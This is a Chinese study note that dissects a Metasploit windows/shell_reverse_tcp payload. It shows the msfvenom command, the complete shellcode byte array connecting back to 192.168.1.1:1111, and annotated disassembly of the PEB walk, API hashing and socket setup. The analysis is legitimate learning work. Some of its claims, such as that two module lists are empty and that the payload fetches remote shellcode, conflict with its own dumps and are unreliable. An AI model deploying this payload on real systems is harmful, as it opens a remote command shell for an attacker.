基本分析

生成指令:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=1111 -f c

生成结果:

/*
 * Raw payload emitted by the msfvenom command above (windows/shell_reverse_tcp,
 * -f c); the two disassembly listings further down decode exactly these bytes.
 * sizeof buf is 325: the 324 payload bytes plus the NUL a string literal adds.
 *
 * The connect-back configuration is stored as 32-bit push immediates, which is
 * what to look for when pulling indicators out of a sample of this family:
 *   "\x68\xc0\xa8\x01\x01"  push 0x0101a8c0 -> LHOST 192.168.1.1 (network order)
 *   "\x68\x02\x00\x04\x57"  push 0x57040002 -> sockaddr_in family 2 (AF_INET),
 *                                              port 0x0457 = 1111 = LPORT
 */
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32"
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x01\x68\x02"
"\x00\x04\x57\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5"
"\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5";

实际对应的汇编语言

.data:00404060                 cld
.data:00404061 call loc_4040E8
.data:00404066 pusha
.data:00404067 mov ebp, esp
.data:00404069 xor eax, eax
.data:0040406B mov edx, fs:[eax+30h]
.data:0040406F mov edx, [edx+0Ch]
.data:00404072 mov edx, [edx+14h]
.data:00404075
.data:00404075 loc_404075: ; CODE XREF: uchar * buf+86↓j
.data:00404075 mov esi, [edx+28h]
.data:00404078 movzx ecx, word ptr [edx+26h]
.data:0040407C xor edi, edi
.data:0040407E
.data:0040407E loc_40407E: ; CODE XREF: uchar * buf+2A↓j
.data:0040407E lodsb
.data:0040407F cmp al, 61h ; 'a'
.data:00404081 jl short loc_404085
.data:00404083 sub al, 20h ; ' '
.data:00404085
.data:00404085 loc_404085: ; CODE XREF: uchar * buf+21↑j
.data:00404085 ror edi, 0Dh
.data:00404088 add edi, eax
.data:0040408A loop loc_40407E
.data:0040408C push edx
.data:0040408D push edi
.data:0040408E mov edx, [edx+10h]
.data:00404091 mov ecx, [edx+3Ch]
.data:00404094 mov ecx, [ecx+edx+78h]
.data:00404098 jecxz short loc_4040E2
.data:0040409A add ecx, edx
.data:0040409C push ecx
.data:0040409D mov ebx, [ecx+20h]
.data:004040A0 add ebx, edx
.data:004040A2 mov ecx, [ecx+18h]
.data:004040A5
.data:004040A5 loc_4040A5: ; CODE XREF: uchar * buf+5F↓j
.data:004040A5 jecxz short loc_4040E1
.data:004040A7 dec ecx
.data:004040A8 mov esi, [ebx+ecx*4]
.data:004040AB add esi, edx
.data:004040AD xor edi, edi
.data:004040AF
.data:004040AF loc_4040AF: ; CODE XREF: uchar * buf+57↓j
.data:004040AF lodsb
.data:004040B0 ror edi, 0Dh
.data:004040B3 add edi, eax
.data:004040B5 cmp al, ah
.data:004040B7 jnz short loc_4040AF
.data:004040B9 add edi, [ebp-8]
.data:004040BC cmp edi, [ebp+24h]
.data:004040BF jnz short loc_4040A5
.data:004040C1 pop eax
.data:004040C2 mov ebx, [eax+24h]
.data:004040C5 add ebx, edx
.data:004040C7 mov cx, [ebx+ecx*2]
.data:004040CB mov ebx, [eax+1Ch]
.data:004040CE add ebx, edx
.data:004040D0 mov eax, [ebx+ecx*4]
.data:004040D3 add eax, edx
.data:004040D5 mov [esp+28h+var_4], eax
.data:004040D9 pop ebx
.data:004040DA pop ebx
.data:004040DB popa
.data:004040DC pop ecx
.data:004040DD pop edx
.data:004040DE push ecx
.data:004040DF jmp eax
.data:004040E1 ; ---------------------------------------------------------------------------
.data:004040E1
.data:004040E1 loc_4040E1: ; CODE XREF: uchar * buf:loc_4040A5↑j
.data:004040E1 pop edi
.data:004040E2
.data:004040E2 loc_4040E2: ; CODE XREF: uchar * buf+38↑j
.data:004040E2 pop edi
.data:004040E3 pop edx
.data:004040E4 mov edx, [edx]
.data:004040E6 jmp short loc_404075
.data:004040E6 ?buf@@3PAEA endp ; sp-analysis failed
.data:004040E6
.data:004040E8 ; ---------------------------------------------------------------------------
.data:004040E8
.data:004040E8 loc_4040E8: ; CODE XREF: uchar * buf+1↑p
.data:004040E8 pop ebp
.data:004040E9 push 3233h
.data:004040EE push 5F327377h
.data:004040F3 push esp
.data:004040F4 push 726774Ch
.data:004040F9 call ebp
.data:004040FB mov eax, 190h
.data:00404100 sub esp, eax
.data:00404102 push esp
.data:00404103 push eax
.data:00404104 push 6B8029h
.data:00404109 call ebp
.data:0040410B push eax
.data:0040410C push eax
.data:0040410D push eax
.data:0040410E push eax
.data:0040410F inc eax
.data:00404110 push eax
.data:00404111 inc eax
.data:00404112 push eax
.data:00404113 push 0E0DF0FEAh
.data:00404118 call ebp
.data:0040411A xchg eax, edi
.data:0040411B push 5
.data:0040411D push 101A8C0h
.data:00404122 push 57040002h
.data:00404127 mov esi, esp
.data:00404129
.data:00404129 loc_404129: ; CODE XREF: .data:0040413B↓j
.data:00404129 push 10h
.data:0040412B push esi
.data:0040412C push edi
.data:0040412D push 6174A599h
.data:00404132 call ebp
.data:00404134 test eax, eax
.data:00404136 jz short loc_404144
.data:00404138 dec dword ptr [esi+8]
.data:0040413B jnz short loc_404129
.data:0040413D push 56A2B5F0h
.data:00404142 call ebp
.data:00404144
.data:00404144 loc_404144: ; CODE XREF: .data:00404136↑j
.data:00404144 push 646D63h
.data:00404149 mov ebx, esp
.data:0040414B push edi
.data:0040414C push edi
.data:0040414D push edi
.data:0040414E xor esi, esi
.data:00404150 push 12h
.data:00404152 pop ecx
.data:00404153
.data:00404153 loc_404153: ; CODE XREF: .data:00404154↓j
.data:00404153 push esi
.data:00404154 loop loc_404153
.data:00404156 mov word ptr [esp+3Ch], 101h
.data:0040415D lea eax, [esp+10h]
.data:00404161 mov byte ptr [eax], 44h ; 'D'
.data:00404164 push esp
.data:00404165 push eax
.data:00404166 push esi
.data:00404167 push esi
.data:00404168 push esi
.data:00404169 inc esi
.data:0040416A push esi
.data:0040416B dec esi
.data:0040416C push esi
.data:0040416D push esi
.data:0040416E push ebx
.data:0040416F push esi
.data:00404170 push 863FCC79h
.data:00404175 call ebp
.data:00404177 mov eax, esp
.data:00404179 dec esi
.data:0040417A push esi
.data:0040417B inc esi
.data:0040417C push dword ptr [eax]
.data:0040417E push 601D8708h
.data:00404183 call ebp
.data:00404185 mov ebx, 56A2B5F0h
.data:0040418A push 9DBD95A6h
.data:0040418F call ebp
.data:00404191 cmp al, 6
.data:00404193 jl short loc_40419F
.data:00404195 cmp bl, 0E0h
.data:00404198 jnz short loc_40419F
.data:0040419A mov ebx, 6F721347h
.data:0040419F
.data:0040419F loc_40419F: ; CODE XREF: .data:00404193↑j
.data:0040419F ; .data:00404198↑j
.data:0040419F push 0
.data:004041A1 push ebx
.data:004041A2 call ebp

但是上述 shellcode 当中可能存在将数据当作代码的情况,并且需要找出这个分析失败的原因

只需要更改出错的函数的大小就行

对应的反汇编

动态获取kernelbase

mov eax, dword ptr fs : [0x30]// this offset in the TEB is the PEB (Process Environment Block)
mov eax, dword ptr[eax+0xC]// PEB->Ldr, the loader's module-list structure
mov eax, dword ptr[eax + 0x1C]// Ldr->InInitializationOrderModuleList (offset 0x1C, see the table below)
mov eax, [eax]// follow Flink once: eax is now the list's second entry, i.e. the second module it tracks
mov eax,dword ptr[eax+0x8]// DllBase, stored 0x8 bytes past this list entry
mov dwBase,eax// author's note: the module here is kernel32 (it may also be kernelbase) and is the second entry, hence the extra hop above -- confirm against the !peb dump below
InMemoryOrderModuleList 是一个 _LIST_ENTRY 结构,定义了进程加载的模块按内存顺序排列的链表。链表中的每个节点代表一个加载的模块(通常是DLL)

所以

+0x00c InLoadOrderModuleList : _LIST_ENTRY

+0x014 InMemoryOrderModuleList : _LIST_ENTRY

+0x01c InInitializationOrderModuleList : _LIST_ENTRY

都可以访问到加载模块基地址,只是排列顺序不同,所以偏移不一样

0:000> !peb
PEB at 0024b000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00ca0000
NtGlobalFlag: 70
NtGlobalFlag2: 0
Ldr 77f75d80
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 00583760 . 005857f0
Ldr.InLoadOrderModuleList: 00583858 . 0058e620
Ldr.InMemoryOrderModuleList: 00583860 . 0058e628
Base TimeStamp Module
ca0000 677e8efc Jan 08 22:43:08 2025 C:\Users\Aiyakami\Desktop\trust\shellcodeTest.exe
77e50000 6ce0f861 Nov 20 11:56:17 2027 C:\WINDOWS\SYSTEM32\ntdll.dll
76100000 C:\WINDOWS\System32\KERNEL32.DLL
76300000 C:\WINDOWS\System32\KERNELBASE.dll
6e880000 C:\WINDOWS\SYSTEM32\apphelp.dll
75e60000 6763d3a2 Dec 19 16:04:50 2024 C:\WINDOWS\System32\ucrtbase.dll
75cb0000 C:\WINDOWS\SYSTEM32\VCRUNTIME140.dll

InInitializationOrderModuleList:按模块初始化顺序排列的链表。

InLoadOrderModuleList:按模块加载顺序排列的链表。

InMemoryOrderModuleList:按模块在内存中加载顺序排列的链表。

上述 dump 中 InLoadOrderModuleList、InInitializationOrderModuleList 都还没有值,是因为程序还没加载完成,所以操作系统还没有填充它们

1
2
3
4
5
.data:0040406B                 mov     edx, fs:[eax+30h]// PEB (Process Environment Block); eax was zeroed just before, so this is fs:[30h]
.data:0040406F mov edx, [edx+0Ch]// PEB->Ldr, the loader's module list
.data:00404072 mov edx, [edx+14h]// Ldr->InMemoryOrderModuleList, first entry (presumably the process image itself -- compare the !peb dump above)
.data:00404075 mov esi, [edx+28h]// BaseDllName.Buffer of the current entry (source for the name hash loop that follows)
.data:00404078 movzx ecx, word ptr [edx+26h]// BaseDllName.MaximumLength, used as the byte count for that loop

对应的结构

整理得有点乱,上述是对于手动查找 kernelbase 的汇编代码进行研究。实际上网上能找到的多种不同的汇编代码都能实现,原因是可以分别通过下面三张表找到;用的表不同时,汇编代码就会有所不同:

InInitializationOrderModuleList:按模块初始化顺序排列的链表。

InLoadOrderModuleList:按模块加载顺序排列的链表。

InMemoryOrderModuleList:按模块在内存中加载顺序排列的链表。

直接从 XDBG 中 dump 下来,其内容如下。除了动态获取 kernelbase 并调用 API 的部分比较难理解,后续的建立 TCP 反向连接、接收远程 shellcode 并分配内存执行就不深入研究了

00CA4060 | FC                       | cld                                 
00CA4061 | E8 82000000 | call shellcodetest.CA40E8


//通过hash值动态调用函数(此处算法需要改)
00CA4066 | 60 | pushad
00CA4067 | 89E5 | mov ebp,esp
00CA4069 | 31C0 | xor eax,eax
00CA406B | 64:8B50 30 | mov edx,dword ptr fs:[eax+30]
00CA406F | 8B52 0C | mov edx,dword ptr ds:[edx+C]
00CA4072 | 8B52 14 | mov edx,dword ptr ds:[edx+14]
00CA4075 | 8B72 28 | mov esi,dword ptr ds:[edx+28]
00CA4078 | 0FB74A 26 | movzx ecx,word ptr ds:[edx+26]
00CA407C | 31FF | xor edi,edi
00CA407E | AC | lodsb
00CA407F | 3C 61 | cmp al,61
00CA4081 | 7C 02 | jl shellcodetest.CA4085
00CA4083 | 2C 20 | sub al,20
00CA4085 | C1CF 0D | ror edi,D
00CA4088 | 01C7 | add edi,eax
00CA408A | E2 F2 | loop shellcodetest.CA407E
00CA408C | 52 | push edx
00CA408D | 57 | push edi
00CA408E | 8B52 10 | mov edx,dword ptr ds:[edx+10]
00CA4091 | 8B4A 3C | mov ecx,dword ptr ds:[edx+3C]
00CA4094 | 8B4C11 78 | mov ecx,dword ptr ds:[ecx+edx+78]
00CA4098 | E3 48 | jecxz shellcodetest.CA40E2
00CA409A | 01D1 | add ecx,edx
00CA409C | 51 | push ecx
00CA409D | 8B59 20 | mov ebx,dword ptr ds:[ecx+20]
00CA40A0 | 01D3 | add ebx,edx
00CA40A2 | 8B49 18 | mov ecx,dword ptr ds:[ecx+18]
00CA40A5 | E3 3A | jecxz shellcodetest.CA40E1
00CA40A7 | 49 | dec ecx
00CA40A8 | 8B348B | mov esi,dword ptr ds:[ebx+ecx*4]
00CA40AB | 01D6 | add esi,edx
00CA40AD | 31FF | xor edi,edi
00CA40AF | AC | lodsb
00CA40B0 | C1CF 0D | ror edi,D
00CA40B3 | 01C7 | add edi,eax
00CA40B5 | 38E0 | cmp al,ah
00CA40B7 | 75 F6 | jne shellcodetest.CA40AF
00CA40B9 | 037D F8 | add edi,dword ptr ss:[ebp-8]
00CA40BC | 3B7D 24 | cmp edi,dword ptr ss:[ebp+24]
00CA40BF | 75 E4 | jne shellcodetest.CA40A5
00CA40C1 | 58 | pop eax
00CA40C2 | 8B58 24 | mov ebx,dword ptr ds:[eax+24]
00CA40C5 | 01D3 | add ebx,edx
00CA40C7 | 66:8B0C4B | mov cx,word ptr ds:[ebx+ecx*2]
00CA40CB | 8B58 1C | mov ebx,dword ptr ds:[eax+1C]
00CA40CE | 01D3 | add ebx,edx
00CA40D0 | 8B048B | mov eax,dword ptr ds:[ebx+ecx*4]
00CA40D3 | 01D0 | add eax,edx
00CA40D5 | 894424 24 | mov dword ptr ss:[esp+24],eax
00CA40D9 | 5B | pop ebx
00CA40DA | 5B | pop ebx
00CA40DB | 61 | popad
00CA40DC | 59 | pop ecx
00CA40DD | 5A | pop edx
00CA40DE | 51 | push ecx
00CA40DF | FFE0 | jmp eax
00CA40E1 | 5F | pop edi
00CA40E2 | 5F | pop edi
00CA40E3 | 5A | pop edx
00CA40E4 | 8B12 | mov edx,dword ptr ds:[edx]
00CA40E6 | EB 8D | jmp shellcodetest.CA4075


//建立TCP反向连接 这一段中的call ebp就是call上面一个函数
00CA40E8 | 5D | pop ebp
00CA40E9 | 68 33320000 | push 3233
00CA40EE | 68 7773325F | push 5F327377
00CA40F3 | 54 | push esp
00CA40F4 | 68 4C772607 | push 726774C
00CA40F9 | FFD5 | call ebp
00CA40FB | B8 90010000 | mov eax,190
00CA4100 | 29C4 | sub esp,eax
00CA4102 | 54 | push esp
00CA4103 | 50 | push eax
00CA4104 | 68 29806B00 | push 6B8029
00CA4109 | FFD5 | call ebp
00CA410B | 50 | push eax
00CA410C | 50 | push eax
00CA410D | 50 | push eax
00CA410E | 50 | push eax
00CA410F | 40 | inc eax
00CA4110 | 50 | push eax
00CA4111 | 40 | inc eax
00CA4112 | 50 | push eax
00CA4113 | 68 EA0FDFE0 | push E0DF0FEA
00CA4118 | FFD5 | call ebp
00CA411A | 97 | xchg edi,eax
00CA411B | 6A 05 | push 5
00CA411D | 68 C0A80101 | push 101A8C0 主机ip地址
00CA4122 | 68 02000457 | push 57040002 主机端口号
00CA4127 | 89E6 | mov esi,esp
00CA4129 | 6A 10 | push 10
00CA412B | 56 | push esi
00CA412C | 57 | push edi
00CA412D | 68 99A57461 | push 6174A599
00CA4132 | FFD5 | call ebp
00CA4134 | 85C0 | test eax,eax
00CA4136 | 74 0C | je shellcodetest.CA4144
00CA4138 | FF4E 08 | dec dword ptr ds:[esi+8]
00CA413B | 75 EC | jne shellcodetest.CA4129
00CA413D | 68 F0B5A256 | push 56A2B5F0
00CA4142 | FFD5 | call ebp


//如果连接成功 接收并执行命令
00CA4144 | 68 636D6400 | push 646D63
00CA4149 | 89E3 | mov ebx,esp
00CA414B | 57 | push edi
00CA414C | 57 | push edi
00CA414D | 57 | push edi
00CA414E | 31F6 | xor esi,esi
00CA4150 | 6A 12 | push 12
00CA4152 | 59 | pop ecx
00CA4153 | 56 | push esi
00CA4154 | E2 FD | loop shellcodetest.CA4153
00CA4156 | 66:C74424 3C 0101 | mov word ptr ss:[esp+3C],101
00CA415D | 8D4424 10 | lea eax,dword ptr ss:[esp+10]
00CA4161 | C600 44 | mov byte ptr ds:[eax],44
00CA4164 | 54 | push esp
00CA4165 | 50 | push eax
00CA4166 | 56 | push esi
00CA4167 | 56 | push esi
00CA4168 | 56 | push esi
00CA4169 | 46 | inc esi
00CA416A | 56 | push esi
00CA416B | 4E | dec esi
00CA416C | 56 | push esi
00CA416D | 56 | push esi
00CA416E | 53 | push ebx
00CA416F | 56 | push esi
00CA4170 | 68 79CC3F86 | push 863FCC79
00CA4175 | FFD5 | call ebp
00CA4177 | 89E0 | mov eax,esp
00CA4179 | 4E | dec esi
00CA417A | 56 | push esi
00CA417B | 46 | inc esi
00CA417C | FF30 | push dword ptr ds:[eax]
00CA417E | 68 08871D60 | push 601D8708
00CA4183 | FFD5 | call ebp